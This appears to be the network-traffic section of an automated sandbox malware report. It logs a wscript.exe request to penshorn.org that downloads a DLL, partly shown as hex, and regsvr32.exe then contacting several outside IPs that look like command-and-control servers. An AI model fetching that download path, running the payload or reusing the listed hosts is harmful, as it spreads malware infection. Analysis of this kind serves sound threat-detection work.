Mar 17, 2023 09:10:06.586890936 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586913109 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586914062 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586937904 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.638515949 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.638586998 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.685430050 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.839344978 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.839379072 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.839442015 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.839456081 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.839575052 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.839623928 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.839658976 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.839709044 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.878305912 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878325939 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878484011 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.878521919 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878638983 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878714085 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.878737926 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878808022 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.878880978 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.878896952 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.879014015 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.879110098 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.879127979 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.904869080 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.904993057 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905112982 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.905168056 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905208111 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.905425072 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905541897 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.905569077 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905612946 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905687094 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.905704021 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905783892 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905878067 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.905899048 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.905920982 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.906006098 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.906023979 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.915174007 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.915415049 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.915462971 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.966573000 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.976620913 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.132869005 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.132908106 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133064985 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133070946 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.133146048 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.133155107 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133171082 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133181095 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133198023 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.133268118 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.133281946 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.169388056 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.169681072 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.169715881 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.186523914 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.186717987 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.186758041 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.186836958 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.186906099 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.186919928 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.186953068 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187021971 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.187033892 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187165022 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187231064 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.187248945 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187369108 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187438011 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.187453032 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187541008 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187617064 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.187630892 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187753916 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187824965 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.187838078 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.187943935 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.188011885 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.188025951 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202431917 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202606916 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.202641964 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202665091 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202728987 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.202739000 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202769041 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202841997 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.202851057 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202873945 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202919960 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.202929974 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.202984095 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.203022003 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.216243029 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.216398001 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.223030090 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.223082066 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:07.223104954 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:07.223114967 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:50.935596943 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:50.963152885 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:50.963391066 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:50.967677116 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:50.995165110 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:51.020323038 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:51.020375013 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:51.020546913 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:51.035032034 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:51.064608097 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:51.173388004 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:52.927876949 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:52.928004026 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:52.972656012 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:55.223953009 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:55.268516064 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:58.224143982 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:58.224194050 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:58.224351883 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:58.224580050 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:58.224657059 CET	49686	8080	192.168.2.4	91.121.146.47
Mar 17, 2023 09:10:58.252402067 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:58.252448082 CET	8080	49686	91.121.146.47	192.168.2.4
Mar 17, 2023 09:10:59.416913986 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.517297983 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:10:59.517885923 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.518676043 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.618766069 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:10:59.627656937 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:10:59.627691031 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:10:59.627867937 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.634943962 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.735837936 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:10:59.738583088 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:10:59.880194902 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:00.868459940 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:00.908796072 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:11:03.869127035 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:03.869169950 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:03.869381905 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:11:03.869549036 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:11:03.869621038 CET	49688	7080	192.168.2.4	66.228.32.31
Mar 17, 2023 09:11:03.971625090 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:03.971658945 CET	7080	49688	66.228.32.31	192.168.2.4
Mar 17, 2023 09:11:04.665637970 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:04.665704012 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:04.665852070 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:04.666744947 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:04.666763067 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:05.424669981 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:05.424865961 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:05.433696985 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:05.433720112 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:05.434233904 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:05.435998917 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:05.436028957 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:06.520905972 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:06.521032095 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:06.521239042 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:06.570641041 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:06.570710897 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:06.570748091 CET	49689	443	192.168.2.4	182.162.143.56
Mar 17, 2023 09:11:06.570760965 CET	443	49689	182.162.143.56	192.168.2.4
Mar 17, 2023 09:11:12.415605068 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:15.425674915 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:15.655463934 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:15.655670881 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:15.656486988 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:15.886132956 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:15.901561975 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:15.901599884 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:15.901856899 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:15.904165030 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:16.134445906 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:16.136174917 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:16.405476093 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:17.418488979 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:17.472594023 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:20.418210030 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:20.418245077 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:20.418504953 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:20.420188904 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:20.420305967 CET	49690	80	192.168.2.4	187.63.160.88
Mar 17, 2023 09:11:20.650162935 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:20.650197983 CET	80	49690	187.63.160.88	192.168.2.4
Mar 17, 2023 09:11:21.428977013 CET	49691	8080	192.168.2.4	167.172.199.165
Mar 17, 2023 09:11:21.596690893 CET	8080	49691	167.172.199.165	192.168.2.4
Mar 17, 2023 09:11:22.098119974 CET	49691	8080	192.168.2.4	167.172.199.165
Mar 17, 2023 09:11:22.265835047 CET	8080	49691	167.172.199.165	192.168.2.4
Mar 17, 2023 09:11:22.769920111 CET	49691	8080	192.168.2.4	167.172.199.165
Mar 17, 2023 09:11:22.936942101 CET	8080	49691	167.172.199.165	192.168.2.4
Mar 17, 2023 09:11:28.416771889 CET	49692	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.416850090 CET	443	49692	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.416950941 CET	49692	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.417601109 CET	49692	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.417629957 CET	443	49692	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.449758053 CET	443	49692	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.536175966 CET	49693	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.536242008 CET	443	49693	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.536812067 CET	49693	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.537491083 CET	49693	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.537527084 CET	443	49693	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.569519997 CET	443	49693	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.598723888 CET	49694	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.598815918 CET	443	49694	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.599107981 CET	49694	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.599745989 CET	49694	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.599770069 CET	443	49694	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.631143093 CET	443	49694	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.685215950 CET	49695	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.685300112 CET	443	49695	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.686126947 CET	49695	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.686724901 CET	49695	443	192.168.2.4	164.90.222.65
Mar 17, 2023 09:11:28.686744928 CET	443	49695	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:28.719436884 CET	443	49695	164.90.222.65	192.168.2.4
Mar 17, 2023 09:11:36.169786930 CET	49696	8080	192.168.2.4	104.168.155.143
Mar 17, 2023 09:11:36.334126949 CET	8080	49696	104.168.155.143	192.168.2.4
Mar 17, 2023 09:11:36.848822117 CET	49696	8080	192.168.2.4	104.168.155.143
Mar 17, 2023 09:11:37.013405085 CET	8080	49696	104.168.155.143	192.168.2.4
Mar 17, 2023 09:11:37.520910025 CET	49696	8080	192.168.2.4	104.168.155.143
Mar 17, 2023 09:11:37.685272932 CET	8080	49696	104.168.155.143	192.168.2.4
Mar 17, 2023 09:11:43.211433887 CET	49697	8080	192.168.2.4	163.44.196.120
Mar 17, 2023 09:11:43.424223900 CET	8080	49697	163.44.196.120	192.168.2.4
Mar 17, 2023 09:11:43.935898066 CET	49697	8080	192.168.2.4	163.44.196.120
Mar 17, 2023 09:11:44.148837090 CET	8080	49697	163.44.196.120	192.168.2.4
Mar 17, 2023 09:11:44.662023067 CET	49697	8080	192.168.2.4	163.44.196.120
Mar 17, 2023 09:11:44.874900103 CET	8080	49697	163.44.196.120	192.168.2.4
Mar 17, 2023 09:11:50.931204081 CET	49698	8080	192.168.2.4	160.16.142.56
Mar 17, 2023 09:11:54.037841082 CET	49698	8080	192.168.2.4	160.16.142.56
Mar 17, 2023 09:12:00.053968906 CET	49698	8080	192.168.2.4	160.16.142.56

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:10:03.257808924 CET	62577	53	192.168.2.4	8.8.8.8
Mar 17, 2023 09:10:03.556416035 CET	53	62577	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2023 09:10:03.257808924 CET	192.168.2.4	8.8.8.8	0x6ed1	Standard query (0)	penshorn.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2023 09:10:03.556416035 CET	8.8.8.8	192.168.2.4	0x6ed1	No error (0)	penshorn.org		203.26.41.131	A (IP address)	IN (0x0001)	false
Mar 17, 2023 09:10:51.562388897 CET	8.8.8.8	192.168.2.4	0x3961	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2023 09:10:51.562388897 CET	8.8.8.8	192.168.2.4	0x3961	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

penshorn.org

182.162.143.56

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49685	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49689	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49690	187.63.160.88	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 17, 2023 09:11:15.656486988 CET	502	OUT	Data Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 20 a2 90 48 3f 96 13 68 5d d2 4c b5 ab 78 76 d4 1b e6 01 9d 74 61 ad c6 47 6c 42 34 d6 16 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: d H?h]LxvtaGlB4*,+0/$#('=<5/@#
Mar 17, 2023 09:11:15.901561975 CET	504	IN	Data Raw: 16 03 03 00 41 02 00 00 3d 03 03 6c d7 4f 33 dc bc 52 a5 b3 91 a0 fe 2a 04 e3 b3 8b 8c 37 d8 b2 c9 cc 37 73 5b 89 0f bd 00 c3 ed 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8 Data Ascii: A=lO3R77s[0#00 aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
Mar 17, 2023 09:11:15.901599884 CET	504	IN	Data Raw: 63 51 f5 ac b5 fe c1 82 46 68 e7 08 f3 da 89 e9 31 7a 89 c1 6a 16 97 c5 6f 98 97 1e c4 5f 5a 65 c2 ff df 73 06 e5 df 1b 5f fe 59 77 d7 8d 17 2f 63 16 71 3a f5 c9 cb 35 16 34 d8 9a c6 ba 1a 65 f3 4a a3 eb 2b 16 03 03 00 04 0e 00 00 00 Data Ascii: cQFh1zjo_Zes_Yw/cq:54eJ+
Mar 17, 2023 09:11:15.904165030 CET	504	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 19 6d 01 92 be b1 ab 07 8e 0f f6 00 42 54 87 50 d0 25 d7 0c 8e 6e 40 ff f0 6d ed ac c8 22 05 44 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f4 42 c4 52 37 77 ed f3 2d 82 00 9a c2 2a 9f 82 b5 53 8d 70 27 Data Ascii: %! mBTP%n@m"D(BR7w-*Sp'23
Mar 17, 2023 09:11:16.134445906 CET	504	IN	Data Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 9e 5f 5f 53 b4 a4 0c 53 3f 4c 37 45 6b cb 61 66 d8 5a e8 52 f6 96 78 3c 0f ea 84 ef 13 c1 e7 f0 e4 51 1d 3b c6 f3 1d 33 4a bc 4d 3b cb 4b 53 4d 77 5a c9 Data Ascii: ,A1NatBI__SS?L7EkafZRx<Q;3JM;KSMwZ\|n@SRSncvrK\|g[~`.XbkRw/'s4k;6t!xLR=63 j w^}(\N{ar 4(x7P@iH*
Mar 17, 2023 09:11:16.136174917 CET	504	OUT	Data Raw: 17 03 03 00 8b 00 00 00 00 00 00 00 01 b2 ff 94 20 41 e9 66 91 00 48 b4 a9 63 dc 57 31 6f 40 14 aa ed 93 dd c9 23 11 42 11 63 7d 2d 1f 0e 98 7c 03 df eb 02 de d4 c3 44 d2 96 ff c3 b5 3a 69 fa 81 e7 88 56 1a 8d 46 6c 1c c9 f7 68 2f 5b 5f cf 71 0a Data Ascii: AfHcW1o@#Bc}-\|D:iVFlh/[_qv.knO<y,yZ-lm'y@q
Mar 17, 2023 09:11:17.418488979 CET	505	IN	Data Raw: 17 03 03 01 3e 5c fa 06 91 f5 e8 1d bc 90 62 31 62 9f cb bf 51 b8 1b 99 61 ea 47 6f 1a bb 89 fa 90 5d be 80 ef 1d f3 6c 12 03 80 75 ce 38 97 f8 4d a0 60 30 81 c1 5e 37 96 2c d1 72 e6 0a a8 12 6f 50 9f 0c df ea ca 56 a3 10 b6 54 20 6f 7c 41 72 9e Data Ascii: >\b1bQaGo]lu8M`0^7,roPVT o\|Ar8r_UBCt<$Nr ,TS^tG\|]'t)eC,s3y{/l#LN3 mW_17g_ UO(w<Ed`b<ss
Mar 17, 2023 09:11:20.418210030 CET	505	IN	Data Raw: 15 03 03 00 1a 5c fa 06 91 f5 e8 1d bd 9e 2a 3a c9 39 82 65 0a 27 91 51 0f 50 a9 82 7d 6a ec Data Ascii: \*:9e'QP}j
Mar 17, 2023 09:11:20.420188904 CET	505	OUT	Data Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 d0 78 ca 1b 44 2c 0f 2c 78 51 51 e7 6a 28 c5 af 4b 89 Data Ascii: xD,,xQQj(K

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49685	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:10:04 UTC	0	OUT	GET /admin/Ses8712iGR8du/ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: penshorn.org
2023-03-17 08:10:05 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 17 Mar 2023 08:10:04 GMT Server: Apache X-Powered-By: PHP/7.0.33 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 17 Mar 2023 08:10:05 GMT Content-Disposition: attachment; filename="QStvR8Jwnikk52.dll" Content-Transfer-Encoding: binary Set-Cookie: 6414205d84e34=1679040605; expires=Fri, 17-Mar-2023 08:11:05 GMT; Max-Age=60; path=/ Last-Modified: Fri, 17 Mar 2023 08:10:05 GMT Connection: close Transfer-Encoding: chunked Content-Type: application/x-msdownload
2023-03-17 08:10:05 UTC	0	IN	Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
